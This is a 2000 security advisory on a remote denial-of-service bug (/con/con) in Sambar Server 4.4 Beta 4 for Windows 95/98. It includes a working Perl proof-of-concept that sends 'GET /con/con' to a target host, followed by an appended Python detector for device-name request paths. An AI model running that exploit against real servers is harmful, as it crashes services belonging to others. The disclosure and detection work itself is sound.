The Sambar Server v4.4 Beta 4 for Windows 95/NT is vulnerable to a remote denial of service attack due to the con/con bug. Perl proof of concept code included.
daemon-root's security research
Advisory Name: dae_sambar44b4
Release Date: 10 November 2000
Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
Platform: Windows 95, 98
Severity: The server is still vulnerable to the infamous /con/con exploit
Author: daemon-root (daemon_r00t@secureroot.com)
Web: http://www.daemon-root.da.ru
Overview:
Sambar Server is a free, multithreaded HTTP server for Windows 95/NT.
Its features include HTTP proxy, search engine, log analysis, security,
server-side scripting, and DLLs. This program includes unbuffered CGI support,
a native FTP proxy, a sacrypt encryption utility, and significantly faster
full-text indexing, yet it is still vulnerable to the infamous /con/con exploit,
as were previous versions of Sambar Server.
Proof of concept code:
[dae_sambar44.pl]
# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY!
use IO::Socket;
print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
print "=================================================\n";
if (not $ARGV[0]) {
    print "Usage: $0 [host]\n\n";
    exit(0);
}
sub connecthost {
    $host = IO::Socket::INET->new ( Proto => "tcp",
                                    PeerAddr => $ARGV[0],
                                    PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";
    $host->autoflush(1);
}
$exploit .= "/con/con";
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "GET $exploit HTTP/1.0\n";
print "close connection...\n";
close $host;
[END OF dae_sambar44.pl]
Vendor status:
The vendor was informed on 10 November 2000.
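Detection example (added here; not part of daemon-root's advisory or of Sambar's code): a Python check that flags requests whose path contains a reserved DOS device name, usable over access logs or as a pre-dispatch filter in front of a Windows 9x host. It goes beyond /con/con to the other reserved device names, which is an assumption taken from documented Windows behaviour rather than from the advisory; the function names and log lines are constructed.

```python
import re
from urllib.parse import unquote

# Reserved DOS device names (assumption: documented Windows behaviour, not
# listed in the advisory). Matched case-insensitively, with or without an
# extension, because "CON" and "con.txt" both resolve to the device.
DEVICE_NAMES = (
    {"con", "prn", "aux", "nul", "clock$"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+)')

def device_segments(url_path):
    """Return the path segments that name a DOS device."""
    # Drop the query string first, then percent-decode so /%63on is caught.
    path = unquote(url_path.split("?", 1)[0]).replace("\\", "/")
    hits = []
    for seg in path.split("/"):
        base = seg.split(".", 1)[0].rstrip(" ").lower()
        if base in DEVICE_NAMES:
            hits.append(seg)
    return hits

def flag_log_lines(lines):
    """Return (client, raw_path, hits) for each request naming a device."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = device_segments(m.group(1))
        if hits:
            flagged.append((line.split(" ", 1)[0], m.group(1), hits))
    return flagged

# Constructed sample log lines (common log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2000:10:00:01 +0000] "GET /index.htm HTTP/1.0" 200 1043',
    '192.0.2.44 - - [10/Nov/2000:10:00:07 +0000] "GET /con/con HTTP/1.0" 200 512',
    '192.0.2.44 - - [10/Nov/2000:10:02:13 +0000] "GET /%63on/%43ON HTTP/1.0" 200 512',
    '192.0.2.10 - - [10/Nov/2000:10:03:30 +0000] "GET /console/aux.html HTTP/1.0" 404 0',
    '192.0.2.10 - - [10/Nov/2000:10:04:02 +0000] "GET /docs/context.htm?q=con HTTP/1.0" 200 88',
]

if __name__ == "__main__":
    for client, path, hits in flag_log_lines(SAMPLE_LOG):
        print(f"{client} requested {path}: device segment(s) {hits}")
```

Used as a filter, a non-empty result from device_segments() is the signal to reject the request before any file open is attempted.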